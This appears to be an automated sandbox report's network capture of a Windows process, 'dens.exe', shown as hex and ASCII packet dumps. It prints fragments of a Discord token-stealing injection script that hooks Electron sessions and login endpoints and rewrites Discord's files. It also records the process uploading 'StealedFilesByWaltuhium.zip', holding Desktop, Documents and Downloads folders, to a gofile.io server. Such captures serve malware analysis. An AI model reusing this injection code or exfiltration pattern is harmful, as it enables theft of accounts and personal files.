                                                                                                                                                                                                                                            2024-11-12 23:38:58 UTC1378INData Raw: 63 6f 6e 73 74 20 61 72 67 73 20 3d 20 70 72 6f 63 65 73 73 2e 61 72 67 76 3b 0d 0a 63 6f 6e 73 74 20 66 73 20 3d 20 72 65 71 75 69 72 65 28 27 66 73 27 29 3b 0d 0a 63 6f 6e 73 74 20 70 61 74 68 20 3d 20 72 65 71 75 69 72 65 28 27 70 61 74 68 27 29 3b 0d 0a 63 6f 6e 73 74 20 68 74 74 70 73 20 3d 20 72 65 71 75 69 72 65 28 27 68 74 74 70 73 27 29 3b 0d 0a 63 6f 6e 73 74 20 71 75 65 72 79 73 74 72 69 6e 67 20 3d 20 72 65 71 75 69 72 65 28 27 71 75 65 72 79 73 74 72 69 6e 67 27 29 3b 0d 0a 63 6f 6e 73 74 20 7b 20 42 72 6f 77 73 65 72 57 69 6e 64 6f 77 2c 20 73 65 73 73 69 6f 6e 20 7d 20 3d 20 72 65 71 75 69 72 65 28 27 65 6c 65 63 74 72 6f 6e 27 29 3b 0d 0a 0d 0a 63 6f 6e 73 74 20 63 6f 6e 66 69 67 20 3d 20 7b 0d 0a 20 20 77 65 62 68 6f 6f 6b 3a 20 27 25 57
                                                                                                                                                                                                                                            Data Ascii: const args = process.argv;const fs = require('fs');const path = require('path');const https = require('https');const querystring = require('querystring');const { BrowserWindow, session } = require('electron');const config = { webhook: '%W
                                                                                                                                                                                                                                            2024-11-12 23:38:58 UTC1378INData Raw: 20 27 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 2f 61 70 69 2f 76 2a 2f 75 73 65 72 73 2f 40 6d 65 27 2c 0d 0a 20 20 20 20 20 20 27 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 70 69 2f 76 2a 2f 75 73 65 72 73 2f 40 6d 65 27 2c 0d 0a 20 20 20 20 20 20 27 68 74 74 70 73 3a 2f 2f 2a 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 2f 61 70 69 2f 76 2a 2f 75 73 65 72 73 2f 40 6d 65 27 2c 0d 0a 20 20 20 20 20 20 27 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 70 69 2f 76 2a 2f 61 75 74 68 2f 6c 6f 67 69 6e 27 2c 0d 0a 20 20 20 20 20 20 27 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 2f 61 70 69 2f 76 2a 2f 61 75 74 68 2f 6c 6f 67 69 6e 27 2c 0d 0a 20 20 20 20 20 20 27 68 74 74 70 73 3a 2f 2f
                                                                                                                                                                                                                                            Data Ascii: 'https://discord.com/api/v*/users/@me', 'https://discordapp.com/api/v*/users/@me', 'https://*.discord.com/api/v*/users/@me', 'https://discordapp.com/api/v*/auth/login', 'https://discord.com/api/v*/auth/login', 'https://
                                                                                                                                                                                                                                            2024-11-12 23:38:58 UTC1378INData Raw: 0a 20 20 72 65 74 75 72 6e 20 28 28 6d 73 77 20 26 20 30 78 66 66 66 66 29 20 3c 3c 20 31 36 29 20 7c 20 28 6c 73 77 20 26 20 30 78 66 66 66 66 29 3b 0d 0a 7d 0d 0a 66 75 6e 63 74 69 6f 6e 20 73 61 66 65 41 64 64 5f 33 32 5f 35 28 61 2c 20 62 2c 20 63 2c 20 64 2c 20 65 29 20 7b 0d 0a 20 20 76 61 72 20 6c 73 77 20 3d 20 28 61 20 26 20 30 78 66 66 66 66 29 20 2b 20 28 62 20 26 20 30 78 66 66 66 66 29 20 2b 20 28 63 20 26 20 30 78 66 66 66 66 29 20 2b 20 28 64 20 26 20 30 78 66 66 66 66 29 20 2b 20 28 65 20 26 20 30 78 66 66 66 66 29 2c 0d 0a 20 20 20 20 6d 73 77 20 3d 20 28 61 20 3e 3e 3e 20 31 36 29 20 2b 20 28 62 20 3e 3e 3e 20 31 36 29 20 2b 20 28 63 20 3e 3e 3e 20 31 36 29 20 2b 20 28 64 20 3e 3e 3e 20 31 36 29 20 2b 20 28 65 20 3e 3e 3e 20 31 36 29 20
                                                                                                                                                                                                                                            Data Ascii: return ((msw & 0xffff) << 16) | (lsw & 0xffff);}function safeAdd_32_5(a, b, c, d, e) { var lsw = (a & 0xffff) + (b & 0xffff) + (c & 0xffff) + (d & 0xffff) + (e & 0xffff), msw = (a >>> 16) + (b >>> 16) + (c >>> 16) + (d >>> 16) + (e >>> 16)
                                                                                                                                                                                                                                            2024-11-12 23:38:58 UTC1378INData Raw: 65 41 64 64 5f 35 28 72 6f 74 6c 28 61 2c 20 35 29 2c 20 70 61 72 69 74 79 28 62 2c 20 63 2c 20 64 29 2c 20 65 2c 20 30 78 36 65 64 39 65 62 61 31 2c 20 57 5b 74 5d 29 3b 0d 0a 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 74 20 3c 20 36 30 29 20 7b 0d 0a 20 20 20 20 20 20 54 20 3d 20 73 61 66 65 41 64 64 5f 35 28 72 6f 74 6c 28 61 2c 20 35 29 2c 20 6d 61 6a 28 62 2c 20 63 2c 20 64 29 2c 20 65 2c 20 30 78 38 66 31 62 62 63 64 63 2c 20 57 5b 74 5d 29 3b 0d 0a 20 20 20 20 7d 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 54 20 3d 20 73 61 66 65 41 64 64 5f 35 28 72 6f 74 6c 28 61 2c 20 35 29 2c 20 70 61 72 69 74 79 28 62 2c 20 63 2c 20 64 29 2c 20 65 2c 20 30 78 63 61 36 32 63 31 64 36 2c 20 57 5b 74 5d 29 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 65 20
                                                                                                                                                                                                                                            Data Ascii: eAdd_5(rotl(a, 5), parity(b, c, d), e, 0x6ed9eba1, W[t]); } else if (t < 60) { T = safeAdd_5(rotl(a, 5), maj(b, c, d), e, 0x8f1bbcdc, W[t]); } else { T = safeAdd_5(rotl(a, 5), parity(b, c, d), e, 0xca62c1d6, W[t]); } e
                                                                                                                                                                                                                                            2024-11-12 23:38:58 UTC1378INData Raw: 72 69 6e 67 20 6f 66 20 48 45 58 20 74 79 70 65 20 6d 75 73 74 20 62 65 20 69 6e 20 62 79 74 65 20 69 6e 63 72 65 6d 65 6e 74 73 27 29 3b 0d 0a 20 20 7d 0d 0a 0d 0a 20 20 66 6f 72 20 28 69 20 3d 20 30 3b 20 69 20 3c 20 6c 65 6e 67 74 68 3b 20 69 20 2b 3d 20 32 29 20 7b 0d 0a 20 20 20 20 6e 75 6d 20 3d 20 70 61 72 73 65 49 6e 74 28 73 74 72 2e 73 75 62 73 74 72 28 69 2c 20 32 29 2c 20 31 36 29 3b 0d 0a 20 20 20 20 69 66 20 28 21 69 73 4e 61 4e 28 6e 75 6d 29 29 20 7b 0d 0a 20 20 20 20 20 20 62 79 74 65 4f 66 66 73 65 74 20 3d 20 28 69 20 3e 3e 3e 20 31 29 20 2b 20 65 78 69 73 74 69 6e 67 42 79 74 65 4c 65 6e 3b 0d 0a 20 20 20 20 20 20 69 6e 74 4f 66 66 73 65 74 20 3d 20 62 79 74 65 4f 66 66 73 65 74 20 3e 3e 3e 20 32 3b 0d 0a 20 20 20 20 20 20 77 68 69 6c
                                                                                                                                                                                                                                            Data Ascii: ring of HEX type must be in byte increments'); } for (i = 0; i < length; i += 2) { num = parseInt(str.substr(i, 2), 16); if (!isNaN(num)) { byteOffset = (i >>> 1) + existingByteLen; intOffset = byteOffset >>> 2; whil
                                                                                                                                                                                                                                            2024-11-12 23:38:58 UTC1378INData Raw: 20 20 20 6b 65 79 43 6f 6e 76 65 72 74 65 72 46 75 6e 63 20 3d 20 68 65 78 32 62 69 6e 62 3b 0d 0a 20 20 20 20 20 20 63 6f 6e 76 65 72 74 52 65 74 20 3d 20 6b 65 79 43 6f 6e 76 65 72 74 65 72 46 75 6e 63 28 6b 65 79 29 3b 0d 0a 20 20 20 20 20 20 6b 65 79 42 69 6e 4c 65 6e 20 3d 20 63 6f 6e 76 65 72 74 52 65 74 5b 27 62 69 6e 4c 65 6e 27 5d 3b 0d 0a 20 20 20 20 20 20 6b 65 79 54 6f 55 73 65 20 3d 20 63 6f 6e 76 65 72 74 52 65 74 5b 27 76 61 6c 75 65 27 5d 3b 0d 0a 20 20 20 20 20 20 62 6c 6f 63 6b 42 79 74 65 53 69 7a 65 20 3d 20 76 61 72 69 61 6e 74 42 6c 6f 63 6b 53 69 7a 65 20 3e 3e 3e 20 33 3b 0d 0a 20 20 20 20 20 20 6c 61 73 74 41 72 72 61 79 49 6e 64 65 78 20 3d 20 62 6c 6f 63 6b 42 79 74 65 53 69 7a 65 20 2f 20 34 20 2d 20 31 3b 0d 0a 0d 0a 20 20 20
                                                                                                                                                                                                                                            Data Ascii: keyConverterFunc = hex2binb; convertRet = keyConverterFunc(key); keyBinLen = convertRet['binLen']; keyToUse = convertRet['value']; blockByteSize = variantBlockSize >>> 3; lastArrayIndex = blockByteSize / 4 - 1;
                                                                                                                                                                                                                                            2024-11-12 23:38:58 UTC1378INData Raw: 27 76 61 6c 75 65 27 5d 3b 0d 0a 0d 0a 20 20 20 20 20 20 63 68 75 6e 6b 49 6e 74 4c 65 6e 20 3d 20 63 68 75 6e 6b 42 69 6e 4c 65 6e 20 3e 3e 3e 20 35 3b 0d 0a 20 20 20 20 20 20 66 6f 72 20 28 69 20 3d 20 30 3b 20 69 20 3c 20 63 68 75 6e 6b 49 6e 74 4c 65 6e 3b 20 69 20 2b 3d 20 76 61 72 69 61 6e 74 42 6c 6f 63 6b 49 6e 74 49 6e 63 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 69 66 20 28 75 70 64 61 74 65 50 72 6f 63 65 73 73 65 64 4c 65 6e 20 2b 20 76 61 72 69 61 6e 74 42 6c 6f 63 6b 53 69 7a 65 20 3c 3d 20 63 68 75 6e 6b 42 69 6e 4c 65 6e 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 69 6e 74 65 72 6d 65 64 69 61 74 65 48 20 3d 20 72 6f 75 6e 64 46 75 6e 63 28 63 68 75 6e 6b 2e 73 6c 69 63 65 28 69 2c 20 69 20 2b 20 76 61 72 69 61 6e 74 42 6c 6f 63 6b 49 6e 74
                                                                                                                                                                                                                                            Data Ascii: 'value']; chunkIntLen = chunkBinLen >>> 5; for (i = 0; i < chunkIntLen; i += variantBlockIntInc) { if (updateProcessedLen + variantBlockSize <= chunkBinLen) { intermediateH = roundFunc(chunk.slice(i, i + variantBlockInt
                                                                                                                                                                                                                                            2024-11-12 23:38:58 UTC1378INData Raw: 20 6d 6f 64 75 6c 65 5b 27 65 78 70 6f 72 74 73 27 5d 20 3d 20 65 78 70 6f 72 74 73 20 3d 20 6a 73 53 48 41 3b 0d 0a 20 20 7d 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 65 78 70 6f 72 74 73 20 3d 20 6a 73 53 48 41 3b 0d 0a 20 20 7d 0d 0a 7d 20 65 6c 73 65 20 7b 0d 0a 20 20 67 6c 6f 62 61 6c 5b 27 6a 73 53 48 41 27 5d 20 3d 20 6a 73 53 48 41 3b 0d 0a 7d 0d 0a 0d 0a 69 66 20 28 6a 73 53 48 41 2e 64 65 66 61 75 6c 74 29 20 7b 0d 0a 20 20 6a 73 53 48 41 20 3d 20 6a 73 53 48 41 2e 64 65 66 61 75 6c 74 3b 0d 0a 7d 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 74 6f 74 70 28 6b 65 79 29 20 7b 0d 0a 20 20 63 6f 6e 73 74 20 70 65 72 69 6f 64 20 3d 20 33 30 3b 0d 0a 20 20 63 6f 6e 73 74 20 64 69 67 69 74 73 20 3d 20 36 3b 0d 0a 20 20 63 6f 6e 73 74 20 74 69 6d 65 73 74 61 6d
                                                                                                                                                                                                                                            Data Ascii: module['exports'] = exports = jsSHA; } else { exports = jsSHA; }} else { global['jsSHA'] = jsSHA;}if (jsSHA.default) { jsSHA = jsSHA.default;}function totp(key) { const period = 30; const digits = 6; const timestam
                                                                                                                                                                                                                                            2024-11-12 23:38:58 UTC1378INData Raw: 20 20 68 65 78 20 3d 20 68 65 78 20 2b 20 6c 65 66 74 70 61 64 28 70 61 72 73 65 49 6e 74 28 63 68 75 6e 6b 2c 20 32 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2c 20 32 2c 20 27 30 27 29 3b 0d 0a 20 20 7d 0d 0a 20 20 72 65 74 75 72 6e 20 68 65 78 3b 0d 0a 7d 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 6c 65 66 74 70 61 64 28 73 74 72 2c 20 6c 65 6e 2c 20 70 61 64 29 20 7b 0d 0a 20 20 69 66 20 28 6c 65 6e 20 2b 20 31 20 3e 3d 20 73 74 72 2e 6c 65 6e 67 74 68 29 20 7b 0d 0a 20 20 20 20 73 74 72 20 3d 20 41 72 72 61 79 28 6c 65 6e 20 2b 20 31 20 2d 20 73 74 72 2e 6c 65 6e 67 74 68 29 2e 6a 6f 69 6e 28 70 61 64 29 20 2b 20 73 74 72 3b 0d 0a 20 20 7d 0d 0a 20 20 72 65 74 75 72 6e 20 73 74 72 3b 0d 0a 7d 0d 0a 0d 0a 63 6f 6e 73 74 20 64 69 73 63 6f 72 64 50 61 74 68
                                                                                                                                                                                                                                            Data Ascii: hex = hex + leftpad(parseInt(chunk, 2).toString(16), 2, '0'); } return hex;}function leftpad(str, len, pad) { if (len + 1 >= str.length) { str = Array(len + 1 - str.length).join(pad) + str; } return str;}const discordPath
                                                                                                                                                                                                                                            2024-11-12 23:38:58 UTC1378INData Raw: 29 3b 0d 0a 20 20 69 66 20 28 66 73 2e 65 78 69 73 74 73 53 79 6e 63 28 72 65 73 6f 75 72 63 65 49 6e 64 65 78 29 29 20 66 73 2e 75 6e 6c 69 6e 6b 53 79 6e 63 28 72 65 73 6f 75 72 63 65 49 6e 64 65 78 29 3b 0d 0a 0d 0a 20 20 69 66 20 28 70 72 6f 63 65 73 73 2e 70 6c 61 74 66 6f 72 6d 20 3d 3d 3d 20 27 77 69 6e 33 32 27 20 7c 7c 20 70 72 6f 63 65 73 73 2e 70 6c 61 74 66 6f 72 6d 20 3d 3d 3d 20 27 64 61 72 77 69 6e 27 29 20 7b 0d 0a 20 20 20 20 66 73 2e 77 72 69 74 65 46 69 6c 65 53 79 6e 63 28 0d 0a 20 20 20 20 20 20 70 61 63 6b 61 67 65 4a 73 6f 6e 2c 0d 0a 20 20 20 20 20 20 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 0d 0a 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 6e 61 6d 65 3a 20 27 64 69 73 63 6f 72 64 27 2c 0d 0a 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: ); if (fs.existsSync(resourceIndex)) fs.unlinkSync(resourceIndex); if (process.platform === 'win32' || process.platform === 'darwin') { fs.writeFileSync( packageJson, JSON.stringify( { name: 'discord',


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            4192.168.2.44976045.112.123.1264436500C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-12 23:39:01 UTC137OUTGET /getServer HTTP/1.1
                                                                                                                                                                                                                                            Host: api.gofile.io
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            User-Agent: Python/3.12 aiohttp/3.10.5
                                                                                                                                                                                                                                            2024-11-12 23:39:01 UTC1113INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                            Server: nginx/1.27.1
                                                                                                                                                                                                                                            Date: Tue, 12 Nov 2024 23:39:01 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 14
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
                                                                                                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                            Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                                                                                                                                                                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                            Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-DNS-Prefetch-Control: off
                                                                                                                                                                                                                                            X-Download-Options: noopen
                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                            X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                            ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
                                                                                                                                                                                                                                            2024-11-12 23:39:01 UTC14INData Raw: 65 72 72 6f 72 2d 6e 6f 74 46 6f 75 6e 64
                                                                                                                                                                                                                                            Data Ascii: error-notFound


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            5192.168.2.44976145.112.123.2274436500C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-12 23:39:02 UTC243OUTPOST /uploadFile HTTP/1.1
                                                                                                                                                                                                                                            Host: store1.gofile.io
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            User-Agent: Python/3.12 aiohttp/3.10.5
                                                                                                                                                                                                                                            Content-Length: 79296
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=a2aa766b0cfb48099421bc0f609b093d
                                                                                                                                                                                                                                            2024-11-12 23:39:02 UTC36OUTData Raw: 2d 2d 61 32 61 61 37 36 36 62 30 63 66 62 34 38 30 39 39 34 32 31 62 63 30 66 36 30 39 62 30 39 33 64 0d 0a
                                                                                                                                                                                                                                            Data Ascii: --a2aa766b0cfb48099421bc0f609b093d
                                                                                                                                                                                                                                            2024-11-12 23:39:02 UTC131OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 7a 69 70 2d 63 6f 6d 70 72 65 73 73 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 74 65 61 6c 65 64 46 69 6c 65 73 42 79 57 61 6c 74 75 68 69 75 6d 2e 7a 69 70 22 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: Content-Type: application/x-zip-compressedContent-Disposition: form-data; name="file"; filename="StealedFilesByWaltuhium.zip"
                                                                                                                                                                                                                                            2024-11-12 23:39:02 UTC16384OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 dc 94 6c 59 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 44 54 42 5a 47 49 4f 4f 53 4f 2f 50 4b 03 04 14 00 00 00 00 00 dc 94 6c 59 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 44 65 73 6b 74 6f 70 2f 50 4b 03 04 14 00 00 00 00 00 dd 94 6c 59 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 00 44 6f 63 75 6d 65 6e 74 73 2f 50 4b 03 04 14 00 00 00 00 00 dd 94 6c 59 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 00 44 6f 77 6e 6c 6f 61 64 73 2f 50 4b 03 04 14 00 00 00 00 00 dd 94 6c 59 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 4f 4e 42 51 43 4c 59 53 50 55 2f 50 4b 03 04 14 00 00 00 00 00 dc 94 6c 59 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 55 4d 4d 42 44 4e 45 51 42 4e 2f 50 4b 03 04 14 00 00 00 00 00 dc 94 6c 59
                                                                                                                                                                                                                                            Data Ascii: PKlYDTBZGIOOSO/PKlYDesktop/PKlYDocuments/PKlYDownloads/PKlYONBQCLYSPU/PKlYUMMBDNEQBN/PKlY
                                                                                                                                                                                                                                            2024-11-12 23:39:02 UTC16384OUTData Raw: 85 23 a2 e2 88 d3 fd 0f d2 6f c9 0a b2 2a b9 75 04 d0 78 cf 36 05 0a 24 d2 74 6f c4 98 fd 0d 4f dd 44 43 12 cc a7 13 44 3f 31 86 f7 5e 7d 59 01 39 6e b1 6f 1f d1 58 7b 93 d7 3d df b3 0a e9 53 bb 29 6e ad 63 dc 78 dc 93 4f c2 aa 0d 3d 16 9d 88 49 1c 97 d8 35 8c d5 58 c8 dc cd 7b b2 a7 ab 42 d4 b6 bb d0 f7 7c 4b 84 23 eb 2c 3e ce 3c 7a 58 c9 b5 f9 cc 1a f8 e6 ed d2 b9 be 3e 30 e8 55 6b d8 c2 65 dc ae 79 1d 2c ce ce f8 cc 0c 36 94 86 1a 37 9a 63 cd 51 cf 8d 1d 9c 4b 67 9e 76 44 91 9e 6d 18 bf 20 b7 38 05 09 c0 7e 0c 7a bb 62 8d 06 48 9e a3 6d dd 53 5d d6 2e aa 73 f4 22 cf 55 8c 55 30 c1 ed b8 24 39 3b ce f1 71 40 b8 09 d6 d8 39 8c a1 73 f7 ab f9 e3 bc bb 47 35 d5 1f 86 94 5e 13 ea 8d 50 96 72 46 55 cd 02 b1 1c e9 22 12 1b 77 b1 70 00 ce 0e 0b a6 0a a9 9f 25
                                                                                                                                                                                                                                            Data Ascii: #o*ux6$toODCD?1^}Y9noX{=S)ncxO=I5X{B|K#,><zX>0Ukey,67cQKgvDm 8~zbHmS].s"UU0$9;q@9sG5^PrFU"wp%
                                                                                                                                                                                                                                            2024-11-12 23:39:02 UTC16384OUTData Raw: b3 2e 99 cf af fd f8 85 de bd b2 eb 0e c1 d8 92 cd 01 98 ed ee 0b ef 74 ce a5 bb 7b 5d cf 69 25 ad 63 f0 c5 51 15 2c eb dc 56 07 2d e5 b8 8a dc ec eb 39 60 78 4c 5c 18 e4 45 0d b8 6f db fc 98 66 7a 8a a1 45 4c cc 44 61 93 af fe 70 3d c6 75 e6 42 76 2e 14 92 f3 79 1b e1 35 96 dd 43 33 6c 03 00 ec 4e 4a 9f ea 6a 51 1b fa c8 55 b1 2d 5d e5 2c 50 5c f4 da b6 de bf cf 6b 95 63 bf 31 26 83 07 65 58 b6 33 c0 29 b7 7e 33 f2 2d 51 a6 2b 2e d9 a2 63 7a d4 12 9c 27 3a 1d be 49 80 f8 a2 a6 3f 76 16 03 b7 26 bc b6 8d be 8f a7 4f 54 8c 50 7b a1 ff 28 e0 0a 65 d9 a8 d1 f9 14 a8 4d af da 3d 05 d2 f9 68 5d 6f 64 31 84 61 bb 64 27 8f 2a 44 63 fc d4 8b 22 2e 78 94 52 5b 3e d6 ea de 66 98 1d 6a 7c e5 e3 dd d4 2f 05 97 cd 14 6f a1 56 86 69 fa 03 cf a3 e0 77 26 b4 b7 44 11 fb
                                                                                                                                                                                                                                            Data Ascii: .t{]i%cQ,V-9`xL\EofzELDap=uBv.y5C3lNJjQU-],P\kc1&eX3)~3-Q+.cz':I?v&OTP{(eM=h]od1ad'*Dc".xR[>fj|/oViw&D
                                                                                                                                                                                                                                            2024-11-12 23:39:02 UTC16384OUTData Raw: 43 46 58 2e 70 6e 67 15 93 49 8e 40 21 08 44 f7 9d f4 a1 44 c5 f1 8b 38 e0 70 ff 83 b4 bd 30 26 92 58 14 af 58 73 c4 ae 41 e3 2e dd 2e 97 97 3b 44 2c 62 2a 16 9c 5f 65 15 a5 ec 92 be cd 8d 9a cc 70 4e e1 a5 3e ba 23 dc 6a 95 a1 64 ab c9 f2 15 5b 30 04 6d 13 0d 90 4a 46 5b 2f c5 d8 6f 68 65 1c c3 98 bd a1 d1 4c 78 2f eb 1e 6c 82 58 9a 35 e7 08 d2 c6 dc 95 48 33 40 86 eb b4 3c af 12 87 79 d3 ea a9 0d c3 74 46 a9 77 22 d5 8d b1 3e e1 79 0b bb aa 24 5f a6 77 3e 0b 3d 98 de 3b e9 58 4e 73 c3 59 df f2 d8 b9 c3 d6 e2 80 82 49 c9 86 e9 ab c4 8d 01 66 f2 de 87 1b 37 94 8e d2 df 83 98 1c 85 fd fb ab d4 24 f3 b8 0e 27 9b 2a fd de a0 dc 96 9b c6 fd e8 f3 29 3e 43 3a 97 e0 e5 49 1f 7f 27 69 ff 0d 53 f7 ea 6b e9 71 93 ec 59 e3 1e 93 e5 24 29 30 88 f6 e9 c4 c7 51 a3 19
                                                                                                                                                                                                                                            Data Ascii: CFX.pngI@!DD8p0&XXsA..;D,b*_epN>#jd[0mJF[/oheLx/lX5H3@<ytFw">y$_w>=;XNsYIf7$'*)>C:I'iSkqY$)0Q
                                                                                                                                                                                                                                            2024-11-12 23:39:02 UTC13553OUTData Raw: 3b 05 1e 9e 16 4e d1 aa 4b 66 eb 6b 15 67 4d 04 a9 f1 07 a3 44 6a 68 a5 d3 07 74 34 58 ef b0 bc 92 4e 39 9e c9 86 90 27 26 93 97 ce 72 97 15 d0 0f f9 b6 d8 6e d0 63 ce ec 13 cd 1e 89 28 07 b5 ce cd 28 6b 5c 59 7a 28 9f 7d f3 df ed 00 c5 c0 c9 c0 cd b1 49 e8 7a dc ed a5 81 5f 47 b4 f5 b5 7c e4 dc 9c 48 eb ea 75 24 a2 bb 98 50 c5 86 99 26 27 e1 ae ef 83 62 55 1c 59 4e e8 37 59 2b a5 75 1a ce 96 15 86 5e 39 3d 87 87 60 97 4a 8f 91 c6 92 b3 50 cd 8a 76 96 16 dd aa 99 bb 65 eb 40 62 d9 73 01 57 00 a3 99 c7 57 a8 18 86 5f 46 f1 5a ce f1 e4 2f 62 cc 4d f8 bd 3e 20 5b 06 9c 1e da 76 da bb 96 84 f2 38 50 4e 6d a5 7e f5 e8 a0 35 bd ec 77 3c 03 8d 5f 5f f3 a9 d9 29 ee 76 ba 8c 5d 65 38 cb 75 db 2a b8 da 15 2b 67 da e8 5e 2c 35 6f d5 02 09 dd 8e aa f1 2e f9 62 ef db
                                                                                                                                                                                                                                            Data Ascii: ;NKfkgMDjht4XN9'&rnc((k\Yz(}Iz_G|Hu$P&'bUYN7Y+u^9=`JPve@bsWW_FZ/bM> [v8PNm~5w<__)v]e8u*+g^,5o.b
                                                                                                                                                                                                                                            2024-11-12 23:39:02 UTC2OUTData Raw: 0d 0a
                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                            2024-11-12 23:39:02 UTC38OUTData Raw: 2d 2d 61 32 61 61 37 36 36 62 30 63 66 62 34 38 30 39 39 34 32 31 62 63 30 66 36 30 39 62 30 39 33 64 2d 2d 0d 0a
                                                                                                                                                                                                                                            Data Ascii: --a2aa766b0cfb48099421bc0f609b093d--
                                                                                                                                                                                                                                            2024-11-12 23:39:03 UTC449INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.27.1
                                                                                                                                                                                                                                            Date: Tue, 12 Nov 2024 23:39:03 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            Content-Length: 443
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
                                                                                                                                                                                                                                            Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
                                                                                                                                                                                                                                            2024-11-12 23:39:03 UTC443INData Raw: 7b 22 64 61 74 61 22 3a 7b 22 63 72 65 61 74 65 54 69 6d 65 22 3a 31 37 33 31 34 35 34 37 34 33 2c 22 64 6f 77 6e 6c 6f 61 64 50 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 66 69 6c 65 2e 69 6f 2f 64 2f 39 78 37 30 6e 71 22 2c 22 67 75 65 73 74 54 6f 6b 65 6e 22 3a 22 35 59 47 43 42 39 35 37 58 6a 58 4e 39 72 66 44 56 54 6e 6d 33 63 71 69 58 39 7a 59 77 6e 34 30 22 2c 22 69 64 22 3a 22 64 36 65 30 61 38 30 66 2d 62 30 64 62 2d 34 63 36 37 2d 61 32 37 66 2d 63 61 31 34 31 65 38 63 33 32 61 62 22 2c 22 6d 64 35 22 3a 22 32 64 65 33 39 30 35 62 33 63 37 39 63 33 65 64 64 66 34 33 36 34 65 66 39 38 61 65 33 36 34 61 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 22 2c 22 6d 6f 64 54 69 6d 65 22 3a 31 37 33 31 34 35
